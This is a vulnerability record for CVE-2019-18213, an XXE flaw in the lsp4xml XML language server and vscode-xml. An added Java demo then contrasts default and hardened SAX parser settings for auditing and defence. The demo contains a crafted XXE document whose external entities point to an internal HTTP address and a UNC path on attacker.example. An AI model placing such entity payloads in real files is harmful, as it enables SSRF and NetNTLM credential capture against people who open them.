{"id":"CVE-2019-18213","details":"XML Language Server (aka lsp4xml) before 0.9.1, as used in Red Hat XML Language Support (aka vscode-xml) before 0.9.1 for Visual Studio Code and other products, allows XXE via a crafted XML document, with resultant SSRF (as well as SMB connection initiation that can lead to NetNTLM challenge/response capture for password cracking). This occurs in extensions/contentmodel/participants/diagnostics/LSPXMLParserConfiguration.java.","modified":"2026-04-10T04:16:35.554465Z","published":"2019-10-23T22:15:10.943Z","references":[{"type":"WEB","url":"https://github.com/angelozerr/lsp4xml/"},{"type":"ADVISORY","url":"https://marketplace.visualstudio.com/items?itemName=redhat.vscode-xml"},{"type":"ADVISORY","url":"https://github.com/angelozerr/lsp4xml/blob/master/CHANGELOG.md#others"},{"type":"FIX","url":"https://github.com/angelozerr/lsp4xml/pull/566"},{"type":"FIX","url":"https://github.com/redhat-developer/vscode-xml/"},{"type":"EVIDENCE","url":"https://www.shielder.it/blog/dont-open-that-xml-xxe-to-rce-in-xml-plugins-for-vs-code-eclipse-theia/"}],"affected":[{"ranges":[{"type":"GIT","repo":"https://github.com/eclipse-lemminx/lemminx","events":[{"introduced":"0"},{"fixed":"bfbd50a13179fb3caed27655564a9202c2e86c72"}],"database_specific":{"versions":[{"introduced":"0"},{"fixed":"0.9.1"}]}}],"versions":["0.3.0","0.4.0","0.5.0","0.5.1","0.6.0","0.7.0","0.9.0","v0.0.1","v0.0.2"],"database_specific":{"source":"https://storage.googleapis.com/cve-osv-conversion/osv-output/CVE-2019-18213.json"}}],"schema_version":"1.7.5","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}]}
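The record above names a parser-configuration class as the locus of the bug. The following is an added example written for this page, not lsp4xml's own code and not the change made in PR 566: it shows the class of defect (a JAXP/Xerces SAX parser left at defaults, which resolves external general entities declared in a DOCTYPE) beside a hardened configuration, and runs offline by replacing the parser's entity resolver with one that only records which system identifiers the parser tried to fetch. The crafted document, its hostnames and its URLs are constructed for the illustration; an attacker's document would point the entities at an internal HTTP service (SSRF) or at a UNC/SMB path (the NetNTLM capture the advisory mentions).

```java
import java.io.StringReader;
import java.util.ArrayList;
import java.util.List;
import javax.xml.XMLConstants;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.EntityResolver;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;
import org.xml.sax.helpers.DefaultHandler;

public class XxeParserConfigDemo {

    // Constructed sample document (hypothetical hosts). The first entity models the
    // SSRF case, the second a UNC-style file URL of the kind used to trigger an SMB
    // connection from a Windows host.
    static final String CRAFTED_XML =
        "<?xml version=\"1.0\"?>\n" +
        "<!DOCTYPE doc [\n" +
        "  <!ENTITY ssrf SYSTEM \"http://127.0.0.1:8080/internal\">\n" +
        "  <!ENTITY smb SYSTEM \"file:////attacker.example/share/x.dtd\">\n" +
        "]>\n" +
        "<doc>&ssrf;&smb;</doc>\n";

    /** Records every external identifier the parser asks for, and never fetches it. */
    static final class RecordingResolver implements EntityResolver {
        final List<String> requested = new ArrayList<>();

        @Override
        public InputSource resolveEntity(String publicId, String systemId) {
            requested.add(systemId);
            return new InputSource(new StringReader("")); // empty replacement text, no I/O
        }
    }

    /** JAXP defaults: DOCTYPE accepted, external general entities resolved. */
    static SAXParserFactory defaultFactory() {
        return SAXParserFactory.newInstance();
    }

    /**
     * Hardened factory. Disallowing the DOCTYPE entirely is the single most effective
     * setting; the remaining features cover parsers that do not honour it.
     */
    static SAXParserFactory hardenedFactory() throws Exception {
        SAXParserFactory f = SAXParserFactory.newInstance();
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        return f;
    }

    /** Parses xml with the given factory and returns the external system IDs it tried to resolve. */
    static List<String> externalFetches(SAXParserFactory factory, String xml) throws Exception {
        SAXParser parser = factory.newSAXParser();
        RecordingResolver resolver = new RecordingResolver();
        // SAXParser.parse(InputSource, DefaultHandler) installs the handler as the
        // EntityResolver as well, so the override below intercepts every external lookup.
        DefaultHandler handler = new DefaultHandler() {
            @Override
            public InputSource resolveEntity(String publicId, String systemId) {
                return resolver.resolveEntity(publicId, systemId);
            }
        };
        try {
            parser.parse(new InputSource(new StringReader(xml)), handler);
        } catch (SAXParseException e) {
            // The hardened parser raises a fatal error at the DOCTYPE, before any
            // entity declaration is processed, so nothing is recorded.
            System.out.println("rejected: " + e.getMessage());
        }
        return resolver.requested;
    }

    public static void main(String[] args) throws Exception {
        System.out.println("default config tried to fetch:  " + externalFetches(defaultFactory(), CRAFTED_XML));
        System.out.println("hardened config tried to fetch: " + externalFetches(hardenedFactory(), CRAFTED_XML));
    }
}
```

With the JDK's bundled Xerces, the first line lists both system identifiers (the parser would have opened an HTTP connection and a UNC path had the resolver not intercepted them); the second line is preceded by the "DOCTYPE is disallowed" fatal error and lists nothing. When auditing a parser configuration like the one named in the record, the check is the same: feed a document with an external entity through a recording resolver and confirm the list stays empty.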